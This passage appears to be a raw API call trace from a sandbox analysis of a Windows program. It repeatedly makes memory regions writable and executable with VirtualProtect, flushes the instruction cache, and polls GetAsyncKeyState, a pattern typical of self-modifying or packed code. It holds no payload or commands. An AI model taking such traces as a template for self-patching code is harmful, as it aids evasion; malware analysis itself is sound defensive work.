(hProcess=0xffffffff, lpBaseAddress=0xcadc938, dwSize=0x14) returned 1 [0114.292] VirtualProtect (in: lpAddress=0xcadc938, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.293] GetCurrentProcess () returned 0xffffffff [0114.293] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc939, dwSize=0x2) returned 1 [0114.293] GetCurrentProcess () returned 0xffffffff [0114.293] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc958, dwSize=0x14) returned 1 [0114.293] VirtualProtect (in: lpAddress=0xcadc958, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.294] GetCurrentProcess () returned 0xffffffff [0114.294] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc959, dwSize=0x2) returned 1 [0114.294] GetCurrentProcess () returned 0xffffffff [0114.294] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc978, dwSize=0x14) returned 1 [0114.294] VirtualProtect (in: lpAddress=0xcadc978, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.294] GetCurrentProcess () returned 0xffffffff [0114.294] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc979, dwSize=0x2) returned 1 [0114.294] GetCurrentProcess () returned 0xffffffff [0114.294] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc998, dwSize=0x14) returned 1 [0114.294] VirtualProtect (in: lpAddress=0xcadc998, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.295] GetCurrentProcess () returned 0xffffffff [0114.295] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc999, dwSize=0x2) returned 1 [0114.295] GetCurrentProcess () returned 0xffffffff [0114.295] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b8, dwSize=0x14) returned 1 [0114.295] VirtualProtect (in: lpAddress=0xcadc9b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.296] GetCurrentProcess () returned 0xffffffff [0114.296] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b9, dwSize=0x2) returned 1 [0114.296] GetCurrentProcess () returned 0xffffffff [0114.296] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d8, dwSize=0x14) returned 1 [0114.296] VirtualProtect (in: lpAddress=0xcadc9d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.296] GetCurrentProcess () returned 0xffffffff [0114.296] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d9, dwSize=0x2) returned 1 [0114.296] GetCurrentProcess () returned 0xffffffff [0114.297] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f8, dwSize=0x14) returned 1 [0114.297] VirtualProtect (in: lpAddress=0xcadc9f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.297] GetCurrentProcess () returned 0xffffffff [0114.297] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f9, dwSize=0x2) returned 1 [0114.297] GetCurrentProcess () returned 0xffffffff [0114.297] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca18, dwSize=0x14) returned 1 [0114.297] VirtualProtect (in: lpAddress=0xcadca18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.298] GetCurrentProcess () returned 0xffffffff [0114.298] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca19, dwSize=0x2) returned 1 [0114.298] GetCurrentProcess () returned 0xffffffff [0114.298] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca38, dwSize=0x14) returned 1 [0114.298] VirtualProtect (in: lpAddress=0xcadca38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.298] GetCurrentProcess () returned 0xffffffff [0114.299] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca39, dwSize=0x2) returned 1 [0114.299] GetCurrentProcess () returned 0xffffffff [0114.299] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca58, dwSize=0x14) returned 1 [0114.299] VirtualProtect (in: lpAddress=0xcadca58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.299] GetCurrentProcess () returned 0xffffffff [0114.299] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca59, dwSize=0x2) returned 1 [0114.299] GetCurrentProcess () returned 0xffffffff [0114.299] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca78, dwSize=0x14) returned 1 [0114.299] VirtualProtect (in: lpAddress=0xcadca78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.300] GetCurrentProcess () returned 0xffffffff [0114.301] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca79, dwSize=0x2) returned 1 [0114.301] GetCurrentProcess () returned 0xffffffff [0114.301] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e0, dwSize=0x14) returned 1 [0114.301] VirtualProtect (in: lpAddress=0xcadb0e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.301] GetCurrentProcess () returned 0xffffffff [0114.301] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e1, dwSize=0x2) returned 1 [0114.301] GetCurrentProcess () returned 0xffffffff [0114.301] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb100, dwSize=0x14) returned 1 [0114.301] VirtualProtect (in: lpAddress=0xcadb100, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.302] GetCurrentProcess () returned 0xffffffff [0114.302] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb101, dwSize=0x2) returned 1 [0114.302] GetCurrentProcess () returned 0xffffffff [0114.302] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb120, dwSize=0x14) returned 1 [0114.302] VirtualProtect (in: lpAddress=0xcadb120, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.303] GetCurrentProcess () returned 0xffffffff [0114.303] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb121, dwSize=0x2) returned 1 [0114.304] GetAsyncKeyState (vKey=3) returned 0 [0114.304] GetAsyncKeyState (vKey=3) returned 0 [0114.304] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.304] CRetailMalloc_Alloc () returned 0xcb76778 [0114.304] memcpy (in: _Dst=0xb754f48, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.304] memcpy (in: _Dst=0xcb76798, _Src=0x197724, _Size=0x18 | out: _Dst=0xcb76798) returned 0xcb76798 [0114.304] CRetailMalloc_Realloc () returned 0xcb76778 [0114.304] CRetailMalloc_Free () returned 0x1 [0114.304] GetCurrentProcess () returned 0xffffffff [0114.304] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912074, dwSize=0x14) returned 1 [0114.304] VirtualProtect (in: lpAddress=0xc912074, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.305] GetCurrentProcess () returned 0xffffffff [0114.305] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912075, dwSize=0x2) returned 1 [0114.305] GetCurrentProcess () returned 0xffffffff [0114.305] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912094, dwSize=0x14) returned 1 [0114.305] VirtualProtect (in: lpAddress=0xc912094, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.306] GetCurrentProcess () returned 0xffffffff [0114.306] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912095, dwSize=0x2) returned 1 [0114.306] GetCurrentProcess () returned 0xffffffff [0114.306] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b4, dwSize=0x14) returned 1 [0114.306] VirtualProtect (in: lpAddress=0xc9120b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.306] GetCurrentProcess () returned 0xffffffff [0114.306] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b5, dwSize=0x2) returned 1 [0114.306] GetCurrentProcess () returned 0xffffffff [0114.307] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d4, dwSize=0x14) returned 1 [0114.307] VirtualProtect (in: lpAddress=0xc9120d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.307] GetCurrentProcess () returned 0xffffffff [0114.307] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d5, dwSize=0x2) returned 1 [0114.307] GetCurrentProcess () returned 0xffffffff [0114.307] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f4, dwSize=0x14) returned 1 [0114.307] VirtualProtect (in: lpAddress=0xc9120f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.308] GetCurrentProcess () returned 0xffffffff [0114.308] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f5, dwSize=0x2) returned 1 [0114.308] GetCurrentProcess () returned 0xffffffff [0114.308] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912114, dwSize=0x14) returned 1 [0114.308] VirtualProtect (in: lpAddress=0xc912114, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.308] GetCurrentProcess () returned 0xffffffff [0114.308] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912115, dwSize=0x2) returned 1 [0114.308] GetCurrentProcess () returned 0xffffffff [0114.309] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912134, dwSize=0x14) returned 1 [0114.309] VirtualProtect (in: lpAddress=0xc912134, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.309] GetCurrentProcess () returned 0xffffffff [0114.309] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912135, dwSize=0x2) returned 1 [0114.309] GetCurrentProcess () returned 0xffffffff [0114.309] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912154, dwSize=0x14) returned 1 [0114.309] VirtualProtect (in: lpAddress=0xc912154, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.310] GetCurrentProcess () returned 0xffffffff [0114.310] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912155, dwSize=0x2) returned 1 [0114.310] GetCurrentProcess () returned 0xffffffff [0114.310] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912174, dwSize=0x14) returned 1 [0114.310] VirtualProtect (in: lpAddress=0xc912174, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.310] GetCurrentProcess () returned 0xffffffff [0114.310] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912175, dwSize=0x2) returned 1 [0114.310] GetCurrentProcess () returned 0xffffffff [0114.310] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912194, dwSize=0x14) returned 1 [0114.311] VirtualProtect (in: lpAddress=0xc912194, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.311] GetCurrentProcess () returned 0xffffffff [0114.311] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912195, dwSize=0x2) returned 1 [0114.311] GetCurrentProcess () returned 0xffffffff [0114.311] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b4, dwSize=0x14) returned 1 [0114.311] VirtualProtect (in: lpAddress=0xc9121b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.312] GetCurrentProcess () returned 0xffffffff [0114.312] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b5, dwSize=0x2) returned 1 [0114.312] GetCurrentProcess () returned 0xffffffff [0114.312] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d4, dwSize=0x14) returned 1 [0114.312] VirtualProtect (in: lpAddress=0xc9121d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.312] GetCurrentProcess () returned 0xffffffff [0114.313] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d5, dwSize=0x2) returned 1 [0114.313] GetCurrentProcess () returned 0xffffffff [0114.313] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc898, dwSize=0x14) returned 1 [0114.313] VirtualProtect (in: lpAddress=0xcadc898, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.313] GetCurrentProcess () returned 0xffffffff [0114.313] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc899, dwSize=0x2) returned 1 [0114.313] GetCurrentProcess () returned 0xffffffff [0114.313] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b8, dwSize=0x14) returned 1 [0114.313] VirtualProtect (in: lpAddress=0xcadc8b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.314] GetCurrentProcess () returned 0xffffffff [0114.314] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b9, dwSize=0x2) returned 1 [0114.314] GetCurrentProcess () returned 0xffffffff [0114.314] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d8, dwSize=0x14) returned 1 [0114.314] VirtualProtect (in: lpAddress=0xcadc8d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.314] GetCurrentProcess () returned 0xffffffff [0114.314] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d9, dwSize=0x2) returned 1 [0114.315] GetCurrentProcess () returned 0xffffffff [0114.315] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f8, dwSize=0x14) returned 1 [0114.315] VirtualProtect (in: lpAddress=0xcadc8f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.315] GetCurrentProcess () returned 0xffffffff [0114.315] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f9, dwSize=0x2) returned 1 [0114.315] GetCurrentProcess () returned 0xffffffff [0114.315] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc918, dwSize=0x14) returned 1 [0114.316] VirtualProtect (in: lpAddress=0xcadc918, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.316] GetCurrentProcess () returned 0xffffffff [0114.316] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc919, dwSize=0x2) returned 1 [0114.316] GetCurrentProcess () returned 0xffffffff [0114.316] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc938, dwSize=0x14) returned 1 [0114.316] VirtualProtect (in: lpAddress=0xcadc938, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.317] GetCurrentProcess () returned 0xffffffff [0114.317] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc939, dwSize=0x2) returned 1 [0114.317] GetCurrentProcess () returned 0xffffffff [0114.317] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc958, dwSize=0x14) returned 1 [0114.317] VirtualProtect (in: lpAddress=0xcadc958, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.317] GetCurrentProcess () returned 0xffffffff [0114.318] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc959, dwSize=0x2) returned 1 [0114.318] GetCurrentProcess () returned 0xffffffff [0114.318] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc978, dwSize=0x14) returned 1 [0114.318] VirtualProtect (in: lpAddress=0xcadc978, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.318] GetCurrentProcess () returned 0xffffffff [0114.318] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc979, dwSize=0x2) returned 1 [0114.318] GetCurrentProcess () returned 0xffffffff [0114.318] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc998, dwSize=0x14) returned 1 [0114.318] VirtualProtect (in: lpAddress=0xcadc998, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.319] GetCurrentProcess () returned 0xffffffff [0114.319] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc999, dwSize=0x2) returned 1 [0114.319] GetCurrentProcess () returned 0xffffffff [0114.319] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b8, dwSize=0x14) returned 1 [0114.319] VirtualProtect (in: lpAddress=0xcadc9b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.320] GetCurrentProcess () returned 0xffffffff [0114.320] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b9, dwSize=0x2) returned 1 [0114.320] GetCurrentProcess () returned 0xffffffff [0114.320] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d8, dwSize=0x14) returned 1 [0114.320] VirtualProtect (in: lpAddress=0xcadc9d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.320] GetCurrentProcess () returned 0xffffffff [0114.320] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d9, dwSize=0x2) returned 1 [0114.320] GetCurrentProcess () returned 0xffffffff [0114.320] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f8, dwSize=0x14) returned 1 [0114.321] VirtualProtect (in: lpAddress=0xcadc9f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.321] GetCurrentProcess () returned 0xffffffff [0114.321] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f9, dwSize=0x2) returned 1 [0114.321] GetCurrentProcess () returned 0xffffffff [0114.321] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca18, dwSize=0x14) returned 1 [0114.321] VirtualProtect (in: lpAddress=0xcadca18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.322] GetCurrentProcess () returned 0xffffffff [0114.322] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca19, dwSize=0x2) returned 1 [0114.322] GetCurrentProcess () returned 0xffffffff [0114.322] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca38, dwSize=0x14) returned 1 [0114.322] VirtualProtect (in: lpAddress=0xcadca38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.322] GetCurrentProcess () returned 0xffffffff [0114.322] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca39, dwSize=0x2) returned 1 [0114.322] GetCurrentProcess () returned 0xffffffff [0114.322] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca58, dwSize=0x14) returned 1 [0114.323] VirtualProtect (in: lpAddress=0xcadca58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.323] GetCurrentProcess () returned 0xffffffff [0114.323] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca59, dwSize=0x2) returned 1 [0114.323] GetCurrentProcess () returned 0xffffffff [0114.323] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca78, dwSize=0x14) returned 1 [0114.323] VirtualProtect (in: lpAddress=0xcadca78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.324] GetCurrentProcess () returned 0xffffffff [0114.324] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca79, dwSize=0x2) returned 1 [0114.324] GetCurrentProcess () returned 0xffffffff [0114.324] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e0, dwSize=0x14) returned 1 [0114.324] VirtualProtect (in: lpAddress=0xcadb0e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.324] GetCurrentProcess () returned 0xffffffff [0114.324] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e1, dwSize=0x2) returned 1 [0114.324] GetCurrentProcess () returned 0xffffffff [0114.324] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb100, dwSize=0x14) returned 1 [0114.325] VirtualProtect (in: lpAddress=0xcadb100, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.325] GetCurrentProcess () returned 0xffffffff [0114.325] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb101, dwSize=0x2) returned 1 [0114.325] GetCurrentProcess () returned 0xffffffff [0114.325] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb120, dwSize=0x14) returned 1 [0114.325] VirtualProtect (in: lpAddress=0xcadb120, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.326] GetCurrentProcess () returned 0xffffffff [0114.326] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb121, dwSize=0x2) returned 1 [0114.327] GetAsyncKeyState (vKey=3) returned 0 [0114.327] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.327] CRetailMalloc_Alloc () returned 0xcb767d8 [0114.327] memcpy (in: _Dst=0xb754f48, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.327] memcpy (in: _Dst=0xcb767f8, _Src=0x197724, _Size=0x18 | out: _Dst=0xcb767f8) returned 0xcb767f8 [0114.328] CRetailMalloc_Realloc () returned 0xcb767d8 [0114.328] CRetailMalloc_Free () returned 0x1 [0114.328] GetCurrentProcess () returned 0xffffffff [0114.328] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912074, dwSize=0x14) returned 1 [0114.328] VirtualProtect (in: lpAddress=0xc912074, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.328] GetCurrentProcess () returned 0xffffffff [0114.328] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912075, dwSize=0x2) returned 1 [0114.328] GetCurrentProcess () returned 0xffffffff [0114.329] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912094, dwSize=0x14) returned 1 [0114.329] VirtualProtect (in: lpAddress=0xc912094, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.329] GetCurrentProcess () returned 0xffffffff [0114.329] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912095, dwSize=0x2) returned 1 [0114.329] GetCurrentProcess () returned 0xffffffff [0114.329] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b4, dwSize=0x14) returned 1 [0114.329] VirtualProtect (in: lpAddress=0xc9120b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.330] GetCurrentProcess () returned 0xffffffff [0114.330] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b5, dwSize=0x2) returned 1 [0114.330] GetCurrentProcess () returned 0xffffffff [0114.330] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d4, dwSize=0x14) returned 1 [0114.330] VirtualProtect (in: lpAddress=0xc9120d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.330] GetCurrentProcess () returned 0xffffffff [0114.330] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d5, dwSize=0x2) returned 1 [0114.331] GetCurrentProcess () returned 0xffffffff [0114.331] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f4, dwSize=0x14) returned 1 [0114.331] VirtualProtect (in: lpAddress=0xc9120f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.335] GetCurrentProcess () returned 0xffffffff [0114.335] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f5, dwSize=0x2) returned 1 [0114.336] GetCurrentProcess () returned 0xffffffff [0114.336] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912114, dwSize=0x14) returned 1 [0114.336] VirtualProtect (in: lpAddress=0xc912114, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.336] GetCurrentProcess () returned 0xffffffff [0114.336] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912115, dwSize=0x2) returned 1 [0114.336] GetCurrentProcess () returned 0xffffffff [0114.336] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912134, dwSize=0x14) returned 1 [0114.336] VirtualProtect (in: lpAddress=0xc912134, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.337] GetCurrentProcess () returned 0xffffffff [0114.337] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912135, dwSize=0x2) returned 1 [0114.337] GetCurrentProcess () returned 0xffffffff [0114.337] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912154, dwSize=0x14) returned 1 [0114.337] VirtualProtect (in: lpAddress=0xc912154, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.337] GetCurrentProcess () returned 0xffffffff [0114.338] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912155, dwSize=0x2) returned 1 [0114.338] GetCurrentProcess () returned 0xffffffff [0114.338] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912174, dwSize=0x14) returned 1 [0114.338] VirtualProtect (in: lpAddress=0xc912174, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.338] GetCurrentProcess () returned 0xffffffff [0114.338] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912175, dwSize=0x2) returned 1 [0114.338] GetCurrentProcess () returned 0xffffffff [0114.338] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912194, dwSize=0x14) returned 1 [0114.338] VirtualProtect (in: lpAddress=0xc912194, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0114.339] GetCurrentProcess () returned 0xffffffff [0114.339] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912195, dwSize=0x2) returned 1 [0114.339] GetCurrentProcess () returned 0xffffffff [0114.339] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b4, dwSize=0x14) returned 1 